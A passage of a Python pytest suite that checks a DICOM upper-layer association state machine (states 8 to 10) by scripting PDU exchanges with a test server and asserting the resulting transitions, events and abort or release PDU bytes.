        # Sta8 + Evt15 -> AA-1 -> Sta13
        # Evt15: Receive A-ABORT (rq) primitive from <local user>
        # AA-1: Send A-ABORT PDU and start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rq),
            ("recv", None),  # recv the A-ABORT from AA-1
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_abort())
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
            ("Sta8", "Evt15", "AA-1"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt15"]

    def test_evt16(self):
        """Test Sta8 + Evt16."""
        # Sta8 + Evt16 -> AA-3 -> Sta13
        # Evt16: Receive A-ABORT PDU from <remote>
        # AA-3: Issue A-ABORT or A-P-ABORT and close connection
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rq),
            ("send", a_abort),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
            ("Sta8", "Evt16", "AA-3"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt16"]

    def test_evt17(self):
        """Test Sta8 + Evt17."""
        # Sta8 + Evt17 -> AA-4 -> Sta1
        # Evt17: Receive TRANSPORT_CLOSED from <transport service>
        # AA-4: Issue A-P-ABORT
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rq),
            ("exit", None),  # server exits -> connection closed under us
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.shutdown()
        time.sleep(0.5)  # allow the local DUL to notice the closed transport
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
            ("Sta8", "Evt17", "AA-4"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt17"]

    def test_evt18(self):
        """Test Sta8 + Evt18."""
        # Sta8 + Evt18 -> <ignore> -> Sta8
        # Evt18: ARTIM timer expired from <local service>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rq),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.artim_timer.timeout = 0.05
        self.assoc.dul.artim_timer.start()
        time.sleep(0.5)  # give the 0.05 s timer time to expire and be processed
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
        # Evt18 is logged but causes no state change
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt18"]

    def test_evt19(self):
        """Test Sta8 + Evt19."""
        # Sta8 + Evt19 -> AA-8 -> Sta13
        # Evt19: Received unrecognised or invalid PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rq),
            # 0x08 is not a valid PDU type -> triggers Evt19 on the requestor
            ("send", b"\x08\x00\x00\x00\x00\x00"),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
            ("Sta8", "Evt19", "AA-8"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt19"]
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState09(TestStateBase):
"""Tests for State 09: Release collision req - awaiting A-RELEASE (rp)."""
    def move_to_state(self, assoc, scp):
        def is_release_requested():
            """Override ACSE.is_release_requested."""
            # Force False so the incoming A-RELEASE-RQ is treated as a
            # release collision rather than a reply to our own request
            return False

        assoc.acse.is_release_requested = is_release_requested
        assoc.start()
        scp.step()  # scp: recv the A-ASSOCIATE-RQ
        scp.step()  # scp: send the A-ASSOCIATE-AC
        self.wait_on_state(assoc.dul.state_machine, "Sta6")
        # Request release locally (Sta7), then have the remote also send an
        # A-RELEASE-RQ -> release collision as requestor -> Sta9
        assoc.dul.send_pdu(self.get_release(False))
        scp.step()  # scp: recv our A-RELEASE-RQ
        scp.step()  # scp: send its own A-RELEASE-RQ (collision)
        self.wait_on_state(assoc.dul.state_machine, "Sta9")
    def test_evt01(self):
        """Test Sta9 + Evt1."""
        # Sta9 + Evt1 -> <ignore> -> Sta9
        # Evt1: A-ASSOCIATE (rq) primitive from <local user>
        commands = [
            ("recv", None),  # recv a-associate-rq
            ("send", a_associate_ac),
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_associate("request"))
        scp.step()
        scp.shutdown()
        # Evt1 is logged but causes no state change from Sta9
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
        ]
        assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
        assert self.fsm._events[:6] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt1",
        ]
    @pytest.mark.skip()
    def test_evt02(self):
        """Test Sta9 + Evt2."""
        # Sta9 + Evt2 -> <ignore> -> Sta9
        # Evt2: Receive TRANSPORT_OPEN from <transport service>
        pass
    def test_evt03(self):
        """Test Sta9 + Evt3."""
        # Sta9 + Evt3 -> AA-8 -> Sta13
        # Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),  # recv a-associate-rq
            ("send", a_associate_ac),
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_associate_ac),  # trigger event
            ("recv", None),  # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:6] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta9", "Evt3", "AA-8"),
        ]
        assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
        assert self.fsm._events[:6] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt3",
        ]
        # A-ABORT PDU (type 0x07) sent by AA-8
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
    def test_evt04(self):
        """Test Sta9 + Evt4."""
        # Sta9 + Evt4 -> AA-8 -> Sta13
        # Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),  # recv a-associate-rq
            ("send", a_associate_ac),
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_associate_rj),  # trigger event
            ("recv", None),  # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:6] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta9", "Evt4", "AA-8"),
        ]
        assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
        assert self.fsm._events[:6] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt4",
        ]
        # A-ABORT PDU (type 0x07) sent by AA-8
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
    @pytest.mark.skip()
    def test_evt05(self):
        """Test Sta9 + Evt5."""
        # Sta9 + Evt5 -> <ignore> -> Sta9
        # Evt5: Receive TRANSPORT_INDICATION from <transport service>
        pass
    def test_evt06(self):
        """Test Sta9 + Evt6."""
        # Sta9 + Evt6 -> AA-8 -> Sta13
        # Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),  # recv a-associate-rq
            ("send", a_associate_ac),
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_associate_rq),  # trigger event
            ("recv", None),  # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:6] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta9", "Evt6", "AA-8"),
        ]
        assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
        assert self.fsm._events[:6] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt6",
        ]
        # A-ABORT PDU (type 0x07) sent by AA-8
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
    def test_evt07(self):
        """Test Sta9 + Evt7."""
        # Sta9 + Evt7 -> <ignore> -> Sta9
        # Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
        commands = [
            ("recv", None),  # recv a-associate-rq
            ("send", a_associate_ac),
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_associate("accept"))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
        ]
        assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
        assert self.fsm._events[:6] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt7",
        ]
    def test_evt08(self):
        """Test Sta9 + Evt8."""
        # Sta9 + Evt8 -> <ignore> -> Sta9
        # Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("send", a_release_rq),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        # Reach Sta9 via the release collision, then fire the local primitive.
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_associate("reject"))
        scp.step()
        scp.shutdown()
        # The event is ignored, so no sixth state change is recorded.
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
        ]
        assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
        assert self.fsm._events[:6] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt8",
        ]
    def test_evt09(self):
        """Test Sta9 + Evt9."""
        # Sta9 + Evt9 -> <ignore> -> Sta9
        # Evt9: Receive P-DATA primitive from <local user>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("send", a_release_rq),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        # Reach Sta9 via the release collision, then fire the local primitive.
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_pdata())
        scp.step()
        scp.shutdown()
        # The event is ignored, so no sixth state change is recorded.
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
        ]
        assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
        assert self.fsm._events[:6] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt9",
        ]
    def test_evt10(self):
        """Test Sta9 + Evt10."""
        # Sta9 + Evt10 -> AA-8 -> Sta13
        # Evt10: Receive P-DATA-TF PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None), # recv a-associate-rq
            ("send", a_associate_ac),
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("send", p_data_tf), # trigger event
            ("recv", None), # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        # Reach Sta9 via the release collision, then let the server script
        # send the out-of-sequence P-DATA-TF.
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:6] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta9", "Evt10", "AA-8"),
        ]
        assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
        assert self.fsm._events[:6] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt10",
        ]
        # Server's third receive is the A-ABORT PDU emitted by AA-8
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
    def test_evt11(self):
        """Test Sta9 + Evt11."""
        # Sta9 + Evt11 -> <ignore> -> Sta9
        # Evt11: Receive A-RELEASE (rq) primitive from <local user>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("send", a_release_rq),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        # Reach Sta9 via the release collision, then fire the local primitive.
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_release(False))
        scp.step()
        scp.shutdown()
        # The event is ignored, so no sixth state change is recorded.
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
        ]
        assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
        assert self.fsm._events[:6] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt11",
        ]
    def test_evt12(self):
        """Test Sta9 + Evt12."""
        # Sta9 + Evt12 -> AA-8 -> Sta13
        # Evt12: Receive A-RELEASE-RQ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None), # recv a-associate-rq
            ("send", a_associate_ac),
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("send", a_release_rq), # trigger event
            ("recv", None), # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        # Reach Sta9 via the release collision; a second A-RELEASE-RQ from the
        # peer is then invalid in this state.
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:6] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta9", "Evt12", "AA-8"),
        ]
        assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
        assert self.fsm._events[:6] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt12",
        ]
        # Server's third receive is the A-ABORT PDU emitted by AA-8
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
    def test_evt13(self):
        """Test Sta9 + Evt13."""
        # Sta9 + Evt13 -> AA-8 -> Sta13
        # Evt13: Receive A-RELEASE-RP PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None), # recv a-associate-rq
            ("send", a_associate_ac),
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("send", a_release_rp), # trigger event
            ("recv", None), # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        # Reach Sta9 via the release collision; the local user has not yet
        # responded, so a peer A-RELEASE-RP is invalid here.
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:6] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta9", "Evt13", "AA-8"),
        ]
        assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
        assert self.fsm._events[:6] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt13",
        ]
        # Server's third receive is the A-ABORT PDU emitted by AA-8
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
    def test_evt14(self):
        """Test Sta9 + Evt14."""
        # Sta9 + Evt14 -> AR-9 -> Sta11
        # Evt14: Receive A-RELEASE (rsp) primitive from <local user>
        # AR-9: Send A-RELEASE-RP PDU to <remote>
        commands = [
            ("recv", None), # recv a-associate-rq
            ("send", a_associate_ac),
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq),
            ("recv", None), # recv a-release-rp
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        # Reach Sta9 via the release collision, then have the local user
        # respond to the collided release request.
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_release(True))
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
        ]
        assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
        assert self.fsm._events[:6] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt14",
        ]
        # Server's third receive is the A-RELEASE-RP PDU emitted by AR-9
        assert scp.handlers[0].received[2] == (
            b"\x06\x00\x00\x00\x00\x04\x00\x00\x00\x00"
        )
    def test_evt15(self):
        """Test Sta9 + Evt15."""
        # Sta9 + Evt15 -> AA-1 -> Sta13
        # Evt15: Receive A-ABORT (rq) primitive from <local user>
        # AA-1: Send A-ABORT PDU to <remote>, start ARTIM
        commands = [
            ("recv", None), # recv a-associate-rq
            ("send", a_associate_ac),
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("recv", None), # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        # Reach Sta9 via the release collision, then abort locally.
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_abort())
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:6] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta9", "Evt15", "AA-1"),
        ]
        assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
        assert self.fsm._events[:6] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt15",
        ]
        # Server's third receive is the A-ABORT PDU emitted by AA-1
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00"
        )
    def test_evt16(self):
        """Test Sta9 + Evt16."""
        # Sta9 + Evt16 -> AA-3 -> Sta1
        # Evt16: Receive A-ABORT PDU from <remote>
        # AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
        commands = [
            ("recv", None), # recv a-associate-rq
            ("send", a_associate_ac),
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("send", a_abort), # trigger event
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        # Reach Sta9 via the release collision, then let the peer abort.
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:6] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta9", "Evt16", "AA-3"),
        ]
        assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
        assert self.fsm._events[:6] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt16",
        ]
    def test_evt17(self):
        """Test Sta9 + Evt17."""
        # Sta9 + Evt17 -> AA-4 -> Sta1
        # Evt17: Receive TRANSPORT_CLOSED from <transport service>
        # AA-4: Issue A-P-ABORT primitive
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("send", a_release_rq),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        # Reach Sta9 via the release collision; shutting the server down
        # closes the transport and produces Evt17.
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.shutdown()
        # Brief pause so the client side can observe the closed transport
        time.sleep(0.5)
        assert self.fsm._changes[:6] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta9", "Evt17", "AA-4"),
        ]
        assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
        assert self.fsm._events[:6] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt17",
        ]
    def test_evt18(self):
        """Test Sta9 + Evt18."""
        # Sta9 + Evt18 -> <ignore> -> Sta9
        # Evt18: ARTIM timer expired from <local service>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("send", a_release_rq),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        # Reach Sta9 via the release collision, then force an ARTIM expiry.
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.artim_timer.timeout = 0.05
        self.assoc.dul.artim_timer.start()
        time.sleep(0.5)
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
        ]
        # NOTE(review): sibling Sta9 tests assert _transitions[:5] including
        # "Sta9"; the [:4] slice here looks like an unintentionally weaker
        # assertion — confirm whether it should be [:5].
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
        assert self.fsm._events[:6] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt18",
        ]
    def test_evt19(self):
        """Test Sta9 + Evt19."""
        # Sta9 + Evt19 -> AA-8 -> Sta13
        # Evt19: Received unrecognised or invalid PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None), # recv a-associate-rq
            ("send", a_associate_ac),
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("send", b"\x08\x00\x00\x00\x00\x00"), # trigger event
            ("recv", None), # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        # Reach Sta9 via the release collision, then send a bogus PDU
        # (type 0x08 is not a valid DUL PDU type).
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:6] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta9", "Evt19", "AA-8"),
        ]
        assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
        assert self.fsm._events[:6] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt19",
        ]
        # Server's third receive is the A-ABORT PDU emitted by AA-8
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState10(TestStateBase):
    """Tests for State 10: Release collision acc - awaiting A-RELEASE-RP .

    In these tests the local association is the *acceptor* (built via
    ``get_acceptor_assoc``), so the scripted server plays the requestor:
    it sends A-ASSOCIATE-RQ, receives the local A-ASSOCIATE-AC, then the
    two sides exchange colliding A-RELEASE-RQ PDUs to land the local FSM
    in Sta10.
    """

    def move_to_state(self, assoc, scp):
        """Drive the acceptor association's FSM into Sta10."""
        def is_release_requested():
            """Override ACSE.is_release_requested."""
            return False

        # Prevent the ACSE from consuming the peer's release request itself
        assoc.acse.is_release_requested = is_release_requested
        assoc.start()
        scp.step()
        scp.step()
        self.wait_on_state(assoc.dul.state_machine, "Sta6")
        # Local release request crosses the peer's -> release collision
        assoc.dul.send_pdu(self.get_release(False))
        scp.step()
        scp.step()
        self.wait_on_state(assoc.dul.state_machine, "Sta10")

    def test_evt01(self):
        """Test Sta10 + Evt1."""
        # Sta10 + Evt1 -> <ignore> -> Sta10
        # Evt1: A-ASSOCIATE (rq) primitive from <local user>
        commands = [
            ("send", a_associate_rq),
            ("recv", None), # recv a-associate-ac
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        assoc.dul.send_pdu(self.get_associate("request"))
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
        assert fsm._changes[:5] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
        ]
        assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt1"]

    @pytest.mark.skip()
    def test_evt02(self):
        """Test Sta10 + Evt2."""
        # Sta10 + Evt2 -> <ignore> -> Sta10
        # Evt2: Receive TRANSPORT_OPEN from <transport service>
        pass

    def test_evt03(self):
        """Test Sta10 + Evt3."""
        # Sta10 + Evt3 -> AA-8 -> Sta13
        # Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("send", a_associate_rq),
            ("recv", None), # recv a-associate-ac
            ("recv", None), # recv a-release-rq
